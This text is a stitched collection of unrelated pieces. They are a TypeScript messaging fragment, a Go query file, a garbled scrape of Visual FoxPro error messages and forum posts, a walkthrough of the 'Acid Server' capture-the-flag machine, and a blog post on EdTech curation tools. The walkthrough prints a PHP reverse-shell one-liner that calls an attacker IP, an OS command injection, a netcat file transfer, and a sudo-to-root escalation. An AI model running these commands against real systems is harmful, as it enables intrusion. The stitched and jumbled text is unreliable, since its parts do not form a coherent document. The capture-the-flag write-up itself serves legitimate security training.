static BROADCAST_LINKED_FRONTS(frontChannelId) : string { return Protocol.make(MSG_CODES.BROADCAST_LINKED_FRONTS, frontChannelId) };
static BROADCAST_ALL_FRONTS() : string { return Protocol.make(MSG_CODES.BROADCAST_ALL_FRONTS) };
// BACK -> FRONT
static CONNECTION_CHANGE(frontUid) : string { return Protocol.make(MSG_CODES.CONNECTION_CHANGE, frontUid) };
static SEND_FRONT(frontUid) : string { return Protocol.make(MSG_CODES.SEND_FRONT, frontUid) };
static ACCEPT_LINK(frontUid): string { return Protocol.make(MSG_CODES.ACCEPT_LINK, frontUid) };
/**
* returns concatenated protocol code if id is provided
* @param code - unique code for different pub/sub types
* @param id - if pub/sub message is unique between channels it needs an id so messages dont get leaked to other channels that don't need them.
* @returns {string}
*/
static make(code: MSG_CODES, id?: string) : string {
return id ? `${code.toString()}-${id}` : code.toString();
}
}
/**
* Class that implements logic to create needed message functions for a channel.
* It uses a channel instance when creating said functions, so theres no need
* to keep track of passing in parameters when wanting to register/unregister/call
* a message since the factory keeps all of that in its scope when instantiated.
*/
abstract class MessageFactory {
protected messenger: Messenger;
constructor(messenger) {
this.messenger = messenger;
}
protected pubCreator(protocol, encoder=true) {
let pub: any = {};
pub = (function (...args) {
if (pub.publisher) {
pub.publisher(...args);
} else {
throw new Error('Unitialized');
}
});
pub.register = () => {
pub.publisher = this.messenger.getOrCreatePublish(protocol, encoder);
pub.unregister = () => {
this.messenger.removePublish(protocol);
};
};
return pub;
}
/**
* push will use the same messenger publisher so any registered subs will receive it but since the recipients
* can change dynamically we want to be able to just give a 'to' parameter to create push and have the protocol
* factory create the message name for us.
* @param protocolFactory - Function used to create the publisher name based on the to parameter passed in.
*/
protected pushCreator(protocolFactory: Function, encoder=true) {
let push: any = {};
push.register = (to) => {
push[to] = this.messenger.getOrCreatePublish(protocolFactory(to), encoder);
push.unregister = () => {
this.messenger.removePublish(protocolFactory(to));
delete push[to];
};
};
return push;
}
/**
* used for subscriptions with multiple handlers. (multiple channels listening for the same broadcast)
* @param protocol
* @param id
* @returns {any}
*/
protected subCreator(protocol, id, decoder=true) {
let sub: any = {};
sub.register = (onSubscriptionHandler: SubscriptionHandler) => {
sub.subscriber = this.messenger.createOrAddSubscription(protocol, id, onSubscriptionHandler, decoder);
sub.unregister = () => {
this.messenger.removeSubscriptionById(protocol, id);
};
};
return sub;
}
/**
* used for subscriptions with only one handler. (single handler listening for unique broadcast)
* @param protocol
* @returns {any}
*/
protected pullCreator(protocolFactory: Function, decoder=true) {
let pull: any = {};
pull.register = (from, onSubscriptionHandler: SubscriptionHandler) => {
pull.subscriber = this.messenger.createSubscription(protocolFactory(from), protocolFactory(from), onSubscriptionHandler, decoder);
pull.unregister = () => {
this.messenger.removeAllSubscriptionsWithName(protocolFactory(from));
};
};
return pull;
}
}
export abstract class ChannelMessageFactory extends MessageFactory {
// FRONT -> BACKS
public abstract CONNECT: PublishProtocol | SubscribeProtocol; //TODO: req/res
public abstract BROADCAST_ALL_BACK: PublishProtocol | SubscribeProtocol;
// FRONT -> BACK
public abstract SEND_BACK: PushProtocol | SubscribeProtocol;
public abstract LINK: PublishProtocol | PullProtocol;
public abstract UNLINK: PublishProtocol | PullProtocol;
public abstract ADD_CLIENT_WRITE: PublishProtocol | PullProtocol;
public abstract REMOVE_CLIENT_WRITE: PublishProtocol | PullProtocol;
// BACK -> FRONT
public abstract CONNECTION_CHANGE: PushProtocol | SubscribeProtocol;
public abstract BROADCAST_LINKED_FRONTS: PublishProtocol | SubscribeProtocol;
public abstract BROADCAST_ALL_FRONTS: PublishProtocol | SubscribeProtocol;
public abstract SEND_FRONT: PublishProtocol | SubscribeProtocol;
public abstract ACCEPT_LINK: PublishProtocol | SubscribeProtocol;
constructor(messenger) {
super(messenger)
}
}
export abstract class MasterMessageFactory extends MessageFactory {
public abstract SEND_QUEUED: PushProtocol | PullProtocol;
public abstract PATCH_STATE: PushProtocol | PullProtocol; //todo switch this to subscribe not pull
public abstract MESSAGE_CLIENT: PushProtocol | SubscribeProtocol;
constructor(messenger) {
super(messenger)
}
}
|
STACK_EDU
|
package labs08
import "reflect"
import "unsafe"
type BigStruct struct {
next *BigStruct
C01 int
C02 int
C03 int
C04 int
C05 int
C06 int
C07 int
C08 int
C09 int
C10 int
C11 int
C12 int
C13 int
C14 int
C15 int
C16 int
C17 int
C18 int
C19 int
C20 int
C21 int
C22 int
C23 int
C24 int
C25 int
C26 int
C27 int
C28 int
C29 int
C30 int
}
// operator
const OP_EQ = 0 // ==
// type
const TP_INT = 0 // int
type Query struct {
conditions []*Condition
}
type Condition struct {
op int
tp int
offset uintptr
value unsafe.Pointer
}
func (q *Query) Match(n *BigStruct) bool {
var nn = uintptr(unsafe.Pointer(n))
for _, c := range q.conditions {
if c.Match(nn) == false {
return false
}
}
return true
}
func (c *Condition) Match(n uintptr) bool {
switch c.op {
case OP_EQ:
var b = unsafe.Pointer(n + c.offset)
switch c.tp {
case TP_INT:
return *(*int)(c.value) == *(*int)(b)
}
}
return false
}
func NewQuery(name string, operator string, value int) *Query {
var t = reflect.TypeOf(BigStruct{})
var f, _ = t.FieldByName(name)
var op int
switch operator {
case "==":
op = OP_EQ
}
return &Query{
[]*Condition{
&Condition{
op: op,
tp: TP_INT,
offset: f.Offset,
value: unsafe.Pointer(&value),
},
},
}
}
|
STACK_EDU
|
Any ideas of what's going on? Basically what happened in my project was that I had deleted a button in an optiongroup and it seems that for some reason FoxPro thought it was still there (I don't We used SET TABLEVALIDATE 0 to work around the issue. I may have some of the details and timelines mixed up, but nevertheless, the problem had gone away and now it's back with SP1 release. check over here
Quote: > Hi everybody........ > Sorry about my english............. > I've got the problem with my form. Duplicate member/property name (Error 1779) Error closing the file (Error 1112) Error code is not valid (Error 1941) Error copying the OLE object to Clipboard (Error 1424) Error creating table: "name" Join your peers on the Internet's largest technical computer professional community.It's easy to join and it's free. Join Us! *Tek-Tips's functionality depends on members receiving e-mail.
Copy all classes into some writable folder which allows their compilation without virtual store side effects... Will I encounter any problems as a recognizable Jew in India? ClassName
Use TABLEUPDATE( ) with the lForce parameter to commit the update or TABLEREVERT( ) to roll back the update. 1586 Function requires row or table buffering mode. 1587 Illegal nested OLDVAL( ) or CURVAL( ). Parent : Object class is invalid for this container" > The button only "OK" and "Help", When I click "OK" then just back. > My stupid solution is rebuild that form They describe for form itself. The C# code is a fairly complex module developed by another programmer that is no longer at our company, but I do have source and I can re-compile, which will be
Nesting level is too deep (Error 1590) Beginning of file encountered (Error 38) Both Unicode and IsBinary properties can not be set to .T.. (Error 2140) Box dimensions are invalid (Error look at this site The COLUMN you want is the column called "PROPERTY" –DRapp Aug 22 '12 at 17:00 add a comment| up vote 0 down vote Hopefully there are no hardcoded file paths anywhere. The Update and Key field properties have been reset to the default values. 1569 Database "name": File access denied. 1570 Database is read-only. 1571 The name "name" is already used for What really makes it difficult is that it is not readily re-producible and I'm not sure I could create a compact enough example to send to Microsoft to help them troubleshoot.
The property is ignored (Error 1584) Error reading file "file" (Error 1104) Error reading the resource (Error 1296) Error saving the OLE object (Error 1422) Error with "name" - "property": "error" SQL commands in the private data session that use those tables are also faster than SQL that has to open the tables. We use SET TABLEVALIDATE TO 0 in our application. Form1
Thank you and my best regards Heksa Wed, 21 Mar 2001 03:00:00 GMT Page 1 of 1 [ 2 post ] Relevant Pages 1. I am not using a cursor because this temporary data entry area sometime needs to be saved even when the user exits the system. Sorry about my english............. Private data sessions share the file handles of opened tables in the global session, so any tables that you open, are USE AGAIN which is faster than a raw USE.
Duplicate member/property name. 1780 This array element has been defined as an object and cannot be redefined in the class definition. 1781 An object's control source cannot be set to its Anyone else seeing more of these with VFP9?... Re-create the index. 1145 Must be a character or numeric key field. 1147 Target table is already engaged in a relation. 1148 Expression has been re-entered while the filter is executing.
Produce Dürer's magic square How to grep rows that have certain value in a specific column? It was implemented like this in the old Fox2.6 system, and now in the new vfp9. The following looks like a good list of files to look for. Thanks again, Optorock –Optorock Aug 21 '12 at 10:29 had another go, scrolled way across and I think I found it:after 15 little boxes it says "members.dbf" with no
Cannot write .SCX file (Error 1968) Only insertable objects are allowed in General fields (Error 1436) Only structural tags can be defined as candidate (Error 1885) Operation is invalid for a Object will be ignored. 1555 Relational expression is not valid. 1556 Table cannot be browsed because cursor object is no longer valid. 1557 The database must be opened exclusively. 1558 File Cannot write .VCX file (Error 1965) One of the members of this Form or FormSet is based on a nonvisual class. ENDFOR or DO CASE ...
There are 3 files for the database itself .dbc -- database .dcx -- compound index of database .dct -- memo field content for database Additionally, the tables can have up to Oh well, guess the production server will just need to stay pre SP1 for now... -- Randy Jean Just thought I would update this topic with some info about our situation. Command failed. "Details". 1410 Unable to create temporary work files. 1411 RUN|! VFP9 release was still cool.
URGENT : CREATE FORM error with VFP6 12. Why was Susan treated so unkindly? This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. Please validate (Error 1561) Database is read-only (Error 1570) Database object is being used by someone else. (Error 1709) Database object type is invalid (Error 1773) DataType property for field "name"
Change the WhereType property of the view (Error 1489) GroupBy clause is too long. (Error 2053) Help for this topic/context not implemented. (Error 2050) Icon is corrupt or in wrong format Thx. Re-create the index (Error 1141) Update conflict (Error 1585) Update conflict. Data was lost (Error 39) Object "name" is not found (Error 1766) Object "name" is not found (Error 1923) Object already has a data environment; cannot use another one with the
CetinBasoz Posted: Visual FoxPro General, Error loading Top It's already saying "File is in use by another user". I may also try the SYS(1104). Since we do not use remote views, the reference is to a local view or a SQL-SELECT cursor. Use the following from the Command window USE "c:\program files\microsoft visual foxpro 9\_app.vcx" ALIAS xxx then Browse Last How many records do you have in the file?
Table "alias" cannot be opened. The errors is : "Error loading file - record number XX. I opened up the scx. The error always refers to a .TMP file, and if I am remembering correctly, it always occurs around the time an END TRANSACTION is executed.
Program is too large (Error 1202) Project file "name" is in the wrong version (Error 1946) Project file is invalid (Error 1685) Project file is read-only (Error 1169) Property "name" already
|
OPCFW_CODE
|
I am trying to get a Z-Wave.Me KFOB-S (Type:ID 0100:0103) running in an openHAB 2 installation. The KFOB-S is detected just fine and I can reach the Thing configuration settings just fine in PaperUI as well as in HABmin. I would like to configure the “Action on group 1” according to KFOB-S User Manual. There should be a “Central Scene to Gateway” for the “Action on group 1” parameter. But I cannot see nor select it; neither in PaperUI nor in HABmin.
Any hints? Ideas how to get the KFOB working with a non-“Central Scene to Gateway” action on group are welcome as well.
These two pictures show the options I have in PaperUI. “Control DoorLock” and “Central Scene to Gateway” are missing.
This picture shows that it is a KFOB-S 0100:0103
This picture shows the same missing options in the HABmin interface.
Maybe the 0100:0103 also means that it is actually a Z-Wave.Me KFOB-C. So far I thought that only Popp has a KFOB-C but the text in the German (printed) user manual calls it KFOB-C and the only documentation calls it ZMEEKFOBC.
Anyhow, the two missing configuration paramters are documented there, too.
Well, I got it working but I am even more convinced that the “Action on group x” (Value 8) is missing in the thing configuraiton parameters.
So how did I get it working? I used the fact that the action I wanted is the default. So I removed the KFOB from the Z-Wave controller, did a factory reset of the KFOB and then added it again as a secondary controller. This time I did not touch the “Action on group” configuration parameter and only added the Z-Wave controller to all four association groups.
Now I can see the scene updates on the openHAB console (with Z-Wave debugging logs enabled).
Maybe @chris has an opinion on the missing (?!) “Action on group x” values 7 and 8.
I can’t see any reason why this would be missing. It’s certainly defined ok in the database and I don’t see why the framework would choose to ignore it.
I just added a thing of this type into my system and I see this configuration fine -:
The fact that it is in the database but it does not show in my openHABian, RaspberryPi3, Razberry based setup is puzzling me as well.
My screenshots are not photoshopped!
I tried a hard reset of the controller and it did not change anything. I am now thinking of completely reinstalling (using openHABian again).
It won’t - it’s nothing at all to do with the controller, or the device - just the database. Maybe the version you have has a problem with the database, alhtough from what I can tell in the history, there’s only been one version of this device.
Really stupid question, but you did scroll down through the options ;). I would also maybe try another browser just in case that’s the problem…
Sorry for the late reply. I thought I had configured a notification when something changed here …
Yes, I used the slider bar to look at all the options. You can see it in the screen shots.
So far I always used Chrome. Now I tried Firefox and it is not visible there either.
Right now it works for me as long as I do not touch the default ghosted “Select a value”. Let’s see if it gets better with the next OpenHAB update.
I found the reason - It looks like your device is detected as a KFOB, not a KFOB-S. If you update to a more recent binding it should work as the IDs were updated 2 months ago to resolve this.
|
OPCFW_CODE
|
knife ssh error -- RbNaCl::LengthError: key was 257 bytes (Expected 32)
Description
knife ssh error involving net-ssh that results in a rbnacl error complaining about key length. Have attempted to install different versions of both net-ssh & rbnacl to no avail. Interestingly, I've tested net-ssh on its own using the following code, which successfully created the connection:
require 'net/ssh'
require 'etc'
user = Etc.getlogin
host = 'host.com'
command = 'ls -lh'
keys = [ "~/.ssh/id_rsa" ]
Net::SSH.start(host,user,:keys => keys,:use_agent => false,:verbose => :debug) do |session|
res= session.exec!(command)
print(res)
end
Related issues in the net-ssh project:
#518
#634
Additionally, I have several colleagues running the same environment who are not experiencing this issue. Ruby version 2.3.5p376.
Chef Version
Chef Development Kit Version: 1.6.11
chef-client version: 12.21.26
delivery version: master (73ebb72a6c42b3d2ff5370c476be800fee7e5427)
berks version: 5.6.4
kitchen version: 1.16.0
inspec version: 1.25.1
Gems:
net-ssh (5.1.0, 4.1.0)
rbnacl (4.0.2)
rbnacl-libsodium (1.0.16)
Platform Version
System Version: macOS 10.14.2 (18C54)
Kernel Version: Darwin 18.2.0
Boot Volume: Macintosh HD
Boot Mode: Normal
Replication Case
knife ssh -a fqdn 'name:somename*' "find /path -type f -name '*somestring*' | grep anotherstring"
Client Output
WARNING: Failed to connect to host.com -- RbNaCl::LengthError: key was 257 bytes (Expected 32)
Stack Trace
Gist here.
I replicated this on chef-client version: 15.0.188 e26d943 just FYI. Please reopen.
Seems to be an issue in net-ssh. When is eta to bump?
We can't bump until other net-* gems are released as we have an unsolvable dependency at the moment.
@tas50 I just forked latest chef/chef and bumped net-ssh and things seem to be working great
What specifically would break that use the other net-* gems?
Chef gets bundled in Chef-DK / Chef Workstation and we need the dependencies there to be the same. In Chef-DK there is a dependency on net-scp that comes in via Test Kitchen. The current non-RC release of net-scp depends on net-ssh < 5.0. We can't have chef in DK and chef inside the client package behaving differently so at the moment we cannot bump the dependency in the actual chef gem. We've reached out the author of net-scp and an RC for a new release of net-scp has been released, but we're waiting on the final release.
@tas50 fantastic and thanks for the follow-up! I'm super glad it was so easy on my end anyways! Keep up the awesome work!
yeah it works on your end because you wind up compiling and linking against your distro's libsodium.
not all distros we ship against ship with libsodium, or with consistent versions of libsodium, so we have to package it and ship that in omnibus. and that is where it all starts to fall apart for us on distros like mac and windows.
|
GITHUB_ARCHIVE
|
using System;
namespace RGiesecke.PlainCsv
{
[Flags]
public enum CsvFlags
{
None = 0,
UseHeaderRow = 1,
QuoteFormulars = 2,
Iso8601Dates = 4,
/// <summary>
/// When set <see cref="PlainCsvReader.ReadCsvRows(System.Collections.Generic.IEnumerable{char})"/> will take line breaks when the field count is less than those of the first row.
/// </summary>
UnQuotedLineBreaks = 8,
}
public class CsvOptions
{
public static readonly CsvOptions Default = new CsvOptions();
public static readonly CsvOptions TabSeparated = new CsvOptions(delimiter:'\t');
public static readonly CsvOptions Excel = new CsvOptions('"', ',', CsvFlags.QuoteFormulars | CsvFlags.UseHeaderRow);
public char QuoteChar { get; private set; }
public char Delimiter { get; private set; }
public CsvFlags CsvFlags { get; private set; }
public bool QuoteFormulars
{
get
{
return (CsvFlags & CsvFlags.QuoteFormulars) == CsvFlags.QuoteFormulars;
}
}
public bool UseHeaderRow
{
get
{
return (CsvFlags & CsvFlags.UseHeaderRow) == CsvFlags.UseHeaderRow;
}
}
public CsvOptions(char? quoteChar = null, char? delimiter = null, CsvFlags? csvFlags = null)
{
var usedQuoteChar = quoteChar ?? Default.QuoteChar;
var usedDelimiter = delimiter ?? Default.Delimiter;
if (usedQuoteChar == usedDelimiter)
{
throw new ArgumentOutOfRangeException("delimiter",
string.Format("delimiter ({0}) and quoteChar ({1}) cannot be the same.",
usedDelimiter,
usedQuoteChar));
}
QuoteChar = usedQuoteChar;
Delimiter = usedDelimiter;
CsvFlags = csvFlags ?? Default.CsvFlags;
}
protected CsvOptions()
: this('"', ',', CsvFlags.UseHeaderRow | CsvFlags.Iso8601Dates)
{ }
public CsvOptions(CsvOptions source, char? quoteChar = null, char? delimiter = null, CsvFlags? csvFlags = null)
:this(quoteChar ?? source.QuoteChar,
delimiter ?? source.Delimiter,
csvFlags ?? source.CsvFlags)
{}
}
}
|
STACK_EDU
|
Decision trees: Measure of split quality which takes into account rare values
I am working on a classification problem in which the positive class is very rare.
The dataset consists of categorical variables, as shown in the example below.
The variables are hierarchical, in the sense that the values which var_i may take depends on the the value of var_i-1. In the mock data below, for instance, var_1 can be l or r when var_0 is a, or u or d when var_0 is b.
var_0
var_1
var_2
y
a
l
x
0
a
r
x
0
a
l
z
0
b
u
p
0
b
d
q
0
b
d
w
1
The variables thus may be thought of as a tree, as visualized below.
·
/ \
/ \
/ \
/ \
/ \
var_0 a b
/ \ / \
/ \ / \
var_1 l r u d
/ \ / \ / \ / \
var_2 x y x y p q q w
I suspect that some of the 'splits' in this tree do not convey any information about my target variable. For example, the split from a into l and r might be redundant, and I could reduce the number of leaf nodes by pruning the tree, resulting in the tree shown below.
·
/ \
/ \
/ \
/ \
/ \
a b
/ \ / \
/ \ / \
x y u d
/ \ / \
p q q w
My first idea for this was to use existing heuristics for pruning decision trees, specifically Gini impurity or information gain.
However, the positive class in my data is very rare, and the tree will therefore contain nodes with very few, or zero, positives. As I understand, a split resulting in nodes with only negative classes will have a high purity, and will thus be retained by a pruning procedure which uses e.g. Gini impurity as a heuristic.
I would like a heuristic which doesn't consider a split 'good' simply if it results in a completely pure node, but also requires that the number of data points in the node is relatively high.
Am I correct that unbalanced datasets are a problem to using Gini impurity for pruning?
If so, what is a good alternative?
When the positive class is very rare, maybe some variant of logistic regression would work better?
The pruning procedure I'm asking about isn't the final classifier. It is meant to be a preprocessing step to lower the dimensionality of a text feature.
|
STACK_EXCHANGE
|
import Vue from 'vue';
import * as zyme from 'zyme';
Vue.use(zyme.ZymePlugin);
describe('vue components service injection', () => {
it('injects services into props', () => {
@zyme.Injectable()
class Foo {}
@zyme.Component()
class Component extends Vue {
@zyme.IocInject()
public foo!: Foo;
public boo = 'asd';
}
let container = new zyme.IocContainer();
container.bind(Foo).toSelf();
let cmp = new Component({
container: container
});
expect(cmp.foo).toBeDefined();
expect(cmp.foo instanceof Foo).toBeTruthy('should be instance of injected class');
});
it('register attribute as dependency provider', () => {
class Foo {}
@zyme.Component()
class Component extends Vue {
@zyme.IocProvide() public foo: Foo = new Foo();
}
let container = new zyme.IocContainer();
let cmp = new Component({
container: container
});
expect(cmp.$container).toBeDefined('should have container');
expect(cmp.$container).not.toBe(container, 'should have child container');
expect(cmp.$container.get(Foo)).toBe(cmp.foo, 'should resolve dependency');
expect(container.isBound(Foo)).toBe(false, 'should not register in parent container');
});
it('register property as dependency provider', () => {
class Foo {}
@zyme.Component()
class Component extends Vue {
private fooz = new Foo();
@zyme.IocProvide()
public get foo(): Foo {
return this.fooz;
}
}
let container = new zyme.IocContainer();
let cmp = new Component({
container: container
});
expect(cmp.$container).toBeDefined('should have container');
expect(cmp.$container).not.toBe(container, 'should have child container');
expect(cmp.$container.get(Foo)).toBe(cmp.foo, 'should resolve dependency');
expect(container.isBound(Foo)).toBe(false, 'should not register in parent container');
});
it('register method as dependency provider', () => {
class Foo {}
@zyme.Component()
class Component extends Vue {
private fooz = new Foo();
@zyme.IocProvide()
public foo(): Foo {
return this.fooz;
}
}
let container = new zyme.IocContainer();
let cmp = new Component({
container: container
});
expect(cmp.$container).toBeDefined('should have container');
expect(cmp.$container).not.toBe(container, 'should have child container');
expect(cmp.$container.get(Foo)).toBe(cmp.foo(), 'should resolve dependency');
expect(container.isBound(Foo)).toBe(false, 'should not register in parent container');
});
it('dependencies are visible in child components', () => {
class Foo {}
@zyme.Injectable()
class Bar {}
@zyme.Component()
class Parent extends Vue {
@zyme.IocProvide() public foo: Foo = new Foo();
}
@zyme.Component()
class Child extends Vue {
@zyme.IocInject()
public foo!: Foo;
@zyme.IocInject()
public bar!: Bar;
}
let container = new zyme.IocContainer();
container
.bind(Bar)
.toSelf()
.inSingletonScope();
let parent = new Parent({
container: container
});
let child = new Child({
parent: parent
});
expect(child.$container).toBeDefined('should have container');
expect(child.$container).toBe(parent.$container, 'should inherit container');
expect(child.foo).toBe(parent.foo, 'should inject dependency from parent into child');
expect(child.bar).toBe(
container.get(Bar),
'should inject dependency from main continer into child'
);
});
it('injects dependencies into inherited components', () => {
@zyme.Injectable()
class Foo {}
@zyme.Component()
class Base extends Vue {
@zyme.IocInject()
public foo!: Foo;
}
@zyme.Component()
class Inherited extends Base {
@zyme.IocInject()
public fooz!: Foo;
}
let container = new zyme.IocContainer();
container
.bind(Foo)
.toSelf()
.inSingletonScope();
let cmp = new Inherited({
container: container
});
expect(cmp.foo).toBe(container.get(Foo), 'should inject inherited prop');
expect(cmp.fooz).toBe(container.get(Foo), 'should inject own prop');
});
it('injects optional dependencies into props', () => {
class Foo {}
@zyme.Component()
class Component extends Vue {
@zyme.IocInject({ optional: true })
public foo!: Foo;
}
let container = new zyme.IocContainer();
container.bind(Foo).toConstantValue(new Foo());
let cmp = new Component({
container: container
});
expect(cmp.foo).toBeDefined();
expect(cmp.foo instanceof Foo).toBe(true);
});
it('not injects unavailable optional dependencies into props', () => {
class Foo {}
@zyme.Component()
class Component extends Vue {
@zyme.IocInject({ optional: true })
public foo!: Foo;
}
let container = new zyme.IocContainer();
let cmp = new Component({
container: container
});
expect(cmp.foo).toBeNull();
});
// powtórzony test
it('injects optional dependencies into props', () => {
class Foo {}
@zyme.Component()
class Component extends Vue {
@zyme.IocInject({ optional: true })
public foo!: Foo;
}
let container = new zyme.IocContainer();
container.bind(Foo).toConstantValue(new Foo());
let cmp = new Component({
container: container
});
expect(cmp.foo).toBeDefined();
expect(cmp.foo instanceof Foo).toBe(true);
});
it('dependencies can be resolved with container', () => {
@zyme.Injectable()
class Foo {}
@zyme.Injectable()
class Bar {
@zyme.IocInject()
public foo!: Foo;
}
@zyme.Component()
class Parent extends Vue {
@zyme.IocProvide({ resolve: true })
public bar!: Bar;
}
@zyme.Component()
class Child extends Vue {
@zyme.IocInject()
public foo!: Foo;
@zyme.IocInject()
public bar!: Bar;
}
let container = new zyme.IocContainer();
let foo = new Foo();
container.bind(Foo).toConstantValue(foo);
let parent = new Parent({
container: container
});
let child = new Child({
parent: parent
});
expect(parent.bar).toBeDefined();
expect(parent.bar).toBe(parent.$container.get(Bar));
expect(parent.bar.foo).toBe(foo);
expect(child.foo).toBe(foo);
expect(child.bar).toBe(parent.bar);
});
it('provided dependencies can depend on each other', () => {
@zyme.Injectable()
class Foo {}
@zyme.Injectable()
class Bar {
@zyme.IocInject()
public foo!: Foo;
}
@zyme.Component()
class Component extends Vue {
@zyme.IocProvide({ resolve: true })
public bar!: Bar;
@zyme.IocProvide({ resolve: true })
public foo!: Foo;
}
let container = new zyme.IocContainer();
let component = new Component({
container: container
});
expect(component.bar).toBeDefined();
expect(component.bar).toBe(component.$container.get(Bar));
expect(component.bar.foo).toBe(component.$container.get(Foo));
expect(component.foo).toBeDefined();
expect(component.foo).toBe(component.$container.get(Foo));
});
});
|
STACK_EDU
|
The name of the Virtual machine is “Acid Server” that we are going to solve today. It is a Boot2Root VM. This is a web-based VM.
Let’s get started!
- Strategy to Solve
- Network Scanning
- Directory Brute-force
- Privilege Escalation to root
Download link: https://www.vulnhub.com/entry/acid-server,125/
Goal: Escalate the privileges to root and capture the flag.
Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.
Strategy to Solve
- Network Scanning (arp-scan, Nmap)
- Directory Brute-force (gobuster)
- Exploit OS command vulnerability on the web page to gain a reverse shell
- Import python one-liner to get an interactive shell
- Search and download the pcap file
- Steal password from the pcap file (Wireshark)
- Get into the shell for privilege escalation
- Switch user (su)
- Take root access and capture the flag
FIrst, let’s find what is the target.
Our target is 192.168.225.140
Now, fire up nmap to scan the ports available on the target.
nmap -p- -A -T4 192.168.225.140
Nmap results show that there is only one open port i.e. 33447 with the services of HTTP. Please observe here that port 80 is not open that means if we want to open this IP address in the browser then we have to use the port number as it will not open it by default. So now open the web page using port number 33447.
From the above image, we can see that there are only a heading and a quote on the page; nothing else but if you look at the tab on the browser, it says “ /Challenge ”. This can be a directory. Let’s try opening it.
It’s opened and we got this login page.
Now, let’s try gobuster to know more about this directory, with the small dictionary (/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt).
gobuster dir -u http://192.168.225.140:33447/Challenge -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null
Here, I am using “-x php” for searching files with php extension.
Note: “2 >/dev/null” will filter out the errors so that they will not be shown in output of console.
I tried every directory but the only cake.php was looking useful. So, let’s open it in the browser.
When you open cake.php, the page says “Ah.haan…There is long way to go..dude :-)”. But upon looking closely you will find the /Magic_Box is written on the browser tab. Let’s open it just like /Challenge.
On opening, this page says that we don’t have permission to access it.
OK! Then let’s try gobuster on this directory.
gobuster dir -u http://192.168.225.140:33447/Challenge/Magic_Box -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null
Out of all directories, the only command.php was looking useful. Let’s open it in the browser.
Upon opening, you will find a ping portal that means you can ping any IP address from here. Try to ping any IP and confirm the results on the page source.
This shows that there are possibilities for OS Command Injection and to be sure let’s run any arbitrary command such as “; ls” as shown below.
Read more: Run multiple commands in Linux
On the page source, you can confirm the results of ls command. And this confirms that this page is vulnerable to OS Command Injection.
Get Reverse Shell
As the page title says “Reverse Kunfu”, it is the hint towards Reverse Shell. So without any delay, run a listener (nc -nvlp 8000) on the attacking machine and enter the following command in the page to take the reverse shell.
php -r '$sock=fsockopen("192.168.225.139",8000);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: Replace the IP and listener port with yours.
I got the shell with www-data user. Also, this is a non-interactive shell and we need an interactive one. Without interaction, the OS cannot ask for password and su won’t work.
Upgrade to Interactive Shell
Run the following command to get the interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'
Finding saman Password
I started checking for files in the system. I found an unusual directory “s.bin” in the system root. It contains a file “investigate.php” whose content asks us to behave like an investigator to catch the culprit.
After going into the /home directory, I found a local user named “saman”. This can be a useful user for us but we don’t have a password to login into it. Let’s try to find the password.
Further looking into the filesystem, I found a directory “raw_vs_isi” inside /sbin directory. It contains a pcap file “hint.pcapng”.
I transfered this file to my own attacking machine with netcat:
On the attacking machine: _nc -lp 1234 > pcap
On the target machine: nc 192.168.225.139 1234 < hint.pcapng
After opening this file with Wireshark, I found a conversation in the TCP stream. Just right-click on any of these filtered packets and then click on the Follow option and then select TCP stream.
In the conversation, one of them says “saman and nowadays he’s known by the alias of 1337hax0r” which means saman is the username (found in the /home directory) and 1337hax0r can be the password. Let’s try it.
We are now login as saman. Here, the result of the “sudo -l” command tells us that we can run any command as the root user.
Privilege Escalation to root
Whenever I get a shell of any box I try to run “sudo -l” to check for any misconfigured permissions. In this case, I could see that saman had the permission to run all command as root!
So, let’s try to switch the user to the root user.
So we got the root with a Congratulations banner.
But, we still have to find the flag. Start with the root’s home directory. It contains only one file flag.txt. So, let’s open it.
After opening the file, we get a message that we successfully completed the challenge.
Note: There are multiple ways to complete this challenge right from the first webpage. Readers are encouraged to try finding the flag in other ways.
I hope, this post helped you to solve this CTF easily and you must have learned something new.
Feel free to contact me for any suggestions and feedbacks. I would really appreciate those.
Thank you for reading!
You can also Buy Me A Coffee if you love the content and want to support this blog page!
|
OPCFW_CODE
|
The last (but not least) compartment in our EdTech toolbox is curation tools. We use these tools and apps to explore the web to find resources related to specific topics that we can save, reference or share out through other channels. In any modern blended learning program, a curation strategy can improve the outcomes for your learners.
According to Anders Pink, curation for learning means:
- Finding the best content from multiple sources, usually external content.
- Filtering it so only the most relevant content makes it through.
- Sharing it with the right internal audiences, at the right time, in the right places.
- Adding value to that content with commentary, context or organization.
With so much content available out there, we need to leverage the power of these tools to more easily find appropriate resources, and make it easier for our communities to access, share, and add to our curated channels.
Automation Versus the Human Touch
Curation tools fall into two wide categories: those that use artificial intelligence (AI) to drive their search, and those that rely mostly on the human touch.
Curation technologies and apps that use AI and algorithms crawl content published on the Web, and allow you to create filters, such as listing keywords or top influencers. These automated tools bring in a wide range of results, and are updated on a regular basis – sometimes within seconds. The results can be narrowed down by focusing in on topics, keywords, etc.
I would argue that all curation tools rely on human input, but some certainly rely more than others on that personal touch. Yes, Google itself is a curation tool (any search engine is), but think about how much work you – the individual - still have to do to filter through those results.
Curation tools that rely solely on human input will never find as many results as those that rely on AI, but you can find that happy medium by starting out with AI-based curation tools, and then filtering further using your own judgment.
Look for These Features
Most of the tools and apps in this category enable team contributions, and have the functionality built in to generate embedded code so that you can share them on your websites. Here are a few different types of curation tools that you can explore.
RSS Feed Readers: Almost every blog, magazine, or serial website has an associated RSS feed. You can pull these feeds together into your RSS reader, and have updated lists at your fingertips to explore. There’s little topic curation at this level, but you can do a broad sweep of the blogs, news sites, and magazines that you want to keep an eye on.
I use RSS feeds every day to get a quick glimpse into all of my favorite online publications and bloggers. My top picks here are Feedly and Feeder, based on ease of use. If I’m on a site that I want to keep track of, I can just click on the Chrome extension icon for Feeder and the site is added to my feeds.
Content Aggregators: Applications like Flipboard allow you to select topics and keywords of interest, and set up magazine-like interfaces based on the AI searches based on your topics and keywords. These two apps, and dozens like them, come in handy when you want to bring together resources around a specific topic, without doing any further filtering. There’s a lot of power in these content aggregation tools, and their output is visually stunning.
